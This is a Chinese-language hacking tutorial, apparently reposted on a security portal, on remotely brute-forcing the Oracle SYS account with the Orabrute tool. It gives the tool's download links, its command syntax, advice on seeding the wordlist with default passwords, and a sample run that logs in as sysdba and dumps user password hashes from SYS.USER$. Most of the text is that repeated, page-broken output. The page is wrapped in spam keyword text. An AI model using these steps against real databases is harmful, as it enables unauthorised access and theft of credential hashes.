国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

通過Orabrute暴力破解oracle密碼
2009-05-22   華盟收集

    1 標準的Oracle 密碼可以由英文字母,數(shù)字,#,下劃線(_),美元字符($)構(gòu)成,密碼的最大長度為30 字符;Oracle 密碼不能以"$","#","_"或任何數(shù)字開頭;密碼不能包含"SELECT","DELETE","CREATE"這類的Oracle/SQL 關(guān)鍵字。

    2 Oracle 的弱算法加密機制:兩個相同的用戶名和密碼在兩臺不同的Oracle 數(shù)據(jù)庫機器中,將具有相同的

哈希值。這些哈希值存儲在SYS.USER$表中。可以通過像DBA_USERS 這類的視圖來訪問。

    3 Oracle 默認配置下,每個帳戶如果有10 次的失敗登錄,此帳戶將會被鎖定。但是SYS 帳戶在Oracle 數(shù)

據(jù)庫中具有最高權(quán)限,能夠做任何事情,包括啟動/關(guān)閉Oracle 數(shù)據(jù)庫。即使SYS 被鎖定,也依然能夠訪問

數(shù)據(jù)庫。

    由前面的基礎(chǔ)知識3,可以得知選擇遠程破解Oracle 的最好帳戶是SYS,因為此帳戶永遠有效。在Oracle10g以前的版本在安裝的時候并沒有提示修改SYS 的默認密碼,Oracle10g 雖然提示修改密碼了,但是并沒有檢查密碼的復雜性。

    可以使用Orabrute 工具來進行遠程破解,在使用這個工具的時候,需要系統(tǒng)提前安裝好Sqlplus,該工具的

    原理很簡單,就是不停的調(diào)用Sqlplus 然后進行登錄驗證,帳戶選擇的是SYS,密碼則為password.txt 中的密碼單詞。只要登錄成功,就會調(diào)用selectpassword.sql 腳本抓取出在SYS.USER$表中的其他用戶的哈希值,然后退出程序。這里有個注意的地方,當?shù)诙芜\行Orabrute 的時候,需要刪除或移動同目錄下的前一次運行Orabrute 時生成的thepasswordsarehere.txt 和output.txt 文件。

Orabrute 的下載地址http://www.ngssoftware.com/research/papers/oraclepasswords.zip

Orabrute 的官方文檔http://www.ngssoftware.com/research/papers/oraclepasswords.pdf

Orabrute 的使用方法為:

D:softoracleOrabrute>orabrute Orabrute v 1.2 by Paul M. Wright and David J. Morgan: orabrute     D:softoracleOrabrute> 

Orabrute 的破解速度比較慢,建議在password.txt開頭加上諸如change_on_install這樣你認為可能的密碼。

D:softoracleOrabrute>orabrute 172.19.111.37 1521 orcl 2000 Orabrute v 1.2 by Paul M. Wright and David J. Morgan: orabrute    sqlplus.exe -S -L "SYS/change_on_install@172.19.111.37:1521/orcl" as sysdba @selectpassword.sql NAME                           PASSWORD ------------------------------ ------------------------------ SYS                            D4C5016086B2DC6A PUBLIC CONNECT RESOURCE DBA SYSTEM                         D4DF7931AB130E37 SELECT_CATALOG_ROLE EXECUTE_CATALOG_ROLE DELETE_CATALOG_ROLE EXP_FULL_DATABASE IMP_FULL_DATABASE NAME                           PASSWORD ------------------------------ ------------------------------ OUTLN                          4A3BA55E08595C81 RECOVERY_CATALOG_OWNER AQ_ADMINISTRATOR_ROLE AQ_USER_ROLE OEM_MONITOR HS_ADMIN_ROLE TRACESVR                       F9DA8977092B7B81 WDEVELOPER AURORA$JIS$UTILITY$             000001501983169 OSE$HTTP$ADMIN                  000001198644021 AURORA$ORB$UNAUTHENTICATED     -000000728729637 NAME                           PASSWORD ------------------------------ ------------------------------ TIMESERIES_DEVELOPER TIMESERIES_DBA CTXAPP TOAD                           361001117A542AC1 DBSNMP                         E066D214D5421CCC WACOS                          1AD491DE05C669FB UTCORE                         9C5CB992189E20D9 NMS                            5E9DEFE765774DC1 JAVA_ADMIN JAVA_DEPLOY SCHEDULER_ADMIN NAME                           PASSWORD ------------------------------ ------------------------------ DIP                            CE4A36B8E06CA59C QUEST_SL_USER TSMSYS                         3DF26A8B17D0F29F OEM_ADVISOR JAVAUSERPRIV JAVAIDPRIV JAVASYSPRIV JAVADEBUGPRIV GATHER_SYSTEM_STATISTICS LOGSTDBY_ADMINISTRATOR GLOBAL_AQ_USER_ROLE            GLOBAL NAME                           PASSWORD ------------------------------ ------------------------------ UTNEW                          C686642569070067 _NEXT_USER TC_ADMIN_ROLE TC_MGR_ROLE TC_LDR_ROLE 49 rows selected. NAME                           PASSWORD ------------------------------ ------------------------------ SYS                            D4C5016086B2DC6A PUBLIC CONNECT RESOURCE DBA SYSTEM                         D4DF7931AB130E37 SELECT_CATALOG_ROLE EXECUTE_CATALOG_ROLE DELETE_CATALOG_ROLE EXP_FULL_DATABASE IMP_FULL_DATABASE NAME                           PASSWORD ------------------------------ ------------------------------ OUTLN                          4A3BA55E08595C81 #p#分頁標題#e#
RECOVERY_CATALOG_OWNER

AQ_ADMINISTRATOR_ROLE

AQ_USER_ROLE

OEM_MONITOR

HS_ADMIN_ROLE

TRACESVR                       F9DA8977092B7B81

WDEVELOPER

AURORA$JIS$UTILITY$             000001501983169

OSE$HTTP$ADMIN                  000001198644021

AURORA$ORB$UNAUTHENTICATED     -000000728729637

NAME                           PASSWORD

------------------------------ ------------------------------

TIMESERIES_DEVELOPER

TIMESERIES_DBA

CTXAPP

TOAD                           361001117A542AC1

DBSNMP                         E066D214D5421CCC

WACOS                          1AD491DE05C669FB

UTCORE                         9C5CB992189E20D9

NMS                            5E9DEFE765774DC1

JAVA_ADMIN
JAVA_DEPLOY
SCHEDULER_ADMIN


NAME                           PASSWORD
------------------------------ ------------------------------
DIP                            CE4A36B8E06CA59C


QUEST_SL_USER

TSMSYS                         3DF26A8B17D0F29F

OEM_ADVISOR

JAVAUSERPRIV

JAVAIDPRIV

JAVASYSPRIV

JAVADEBUGPRIV

GATHER_SYSTEM_STATISTICS

LOGSTDBY_ADMINISTRATOR

GLOBAL_AQ_USER_ROLE            GLOBAL

NAME                           PASSWORD

------------------------------ ------------------------------

UTNEW                          C686642569070067

_NEXT_USER

TC_ADMIN_ROLE

TC_MGR_ROLE

TC_LDR_ROLE

49 rows selected.

NAME                           PASSWORD

#p#分頁標題#e#

------------------------------ ------------------------------

SYS                            D4C5016086B2DC6A

PUBLIC

CONNECT

RESOURCE

DBA

SYSTEM                         D4DF7931AB130E37

SELECT_CATALOG_ROLE

EXECUTE_CATALOG_ROLE

DELETE_CATALOG_ROLE

EXP_FULL_DATABASE

IMP_FULL_DATABASE

NAME                           PASSWORD

------------------------------ ------------------------------

OUTLN                          4A3BA55E08595C81

RECOVERY_CATALOG_OWNER

AQ_ADMINISTRATOR_ROLE

AQ_USER_ROLE

OEM_MONITOR

HS_ADMIN_ROLE

TRACESVR                       F9DA8977092B7B81

WDEVELOPER

AURORA$JIS$UTILITY$             000001501983169

OSE$HTTP$ADMIN                  000001198644021

AURORA$ORB$UNAUTHENTICATED     -000000728729637

NAME                           PASSWORD

------------------------------ ------------------------------

TIMESERIES_DEVELOPER

TIMESERIES_DBA

CTXAPP

TOAD                           361001117A542AC1

DBSNMP                         E066D214D5421CCC

WACOS                          1AD491DE05C669FB

UTCORE                         9C5CB992189E20D9

NMS                            5E9DEFE765774DC1

JAVA_ADMIN

JAVA_DEPLOY

SCHEDULER_ADMIN

NAME                           PASSWORD

------------------------------ ------------------------------

DIP                            CE4A36B8E06CA59C

QUEST_SL_USER

TSMSYS                         3DF26A8B17D0F29F #p#分頁標題#e#

OEM_ADVISOR

JAVAUSERPRIV

JAVAIDPRIV

JAVASYSPRIV

JAVADEBUGPRIV

GATHER_SYSTEM_STATISTICS

LOGSTDBY_ADMINISTRATOR

You will need to delete or move thepasswordsare.txt file befor

e running again.

D:softoracleOrabrute>
 

熱詞搜索:

上一篇:解析木馬攻擊與防御發(fā)展簡史
下一篇:WLC解決無線與有線網(wǎng)絡(luò)之間三不管地帶

分享到: 收藏
主站蜘蛛池模板: 桂林市| 都昌县| 辽阳县| 同心县| 嘉祥县| 林甸县| 分宜县| 林周县| 永修县| 通辽市| 永福县| 龙州县| 青浦区| 江华| 辽阳县| 新巴尔虎左旗| 霍山县| 津市市| 阿拉善左旗| 五大连池市| 扶风县| 元朗区| 苍溪县| 虎林市| 衡阳县| 临西县| 紫金县| 囊谦县| 瑞昌市| 连山| 赣州市| 荣昌县| 正阳县| 丹棱县| 静安区| 邢台市| 沧州市| 英吉沙县| 杨浦区| 洛扎县| 阳山县|